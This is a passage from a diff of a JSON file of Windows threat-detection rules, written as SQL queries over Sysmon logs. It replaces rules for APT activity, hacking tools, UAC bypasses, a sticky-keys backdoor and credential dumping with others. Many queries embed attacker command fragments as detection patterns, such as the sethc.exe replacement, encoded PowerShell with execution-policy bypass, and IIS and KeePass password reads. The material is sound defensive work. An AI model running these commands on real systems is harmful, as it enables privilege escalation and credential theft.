ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Legitimate administration use but user and host must be investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.g0069" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "description": "Detects the execution of msiexec.exe from an uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", - "status": "test", - "description": "Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "status": "experimental", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", - "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "status": "test", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution" + "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Unknown sub processes of Wsreset.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "status": "test", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Programs that use the same command line flags" + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Nim on a developer systems" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "status": "test", + "description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": 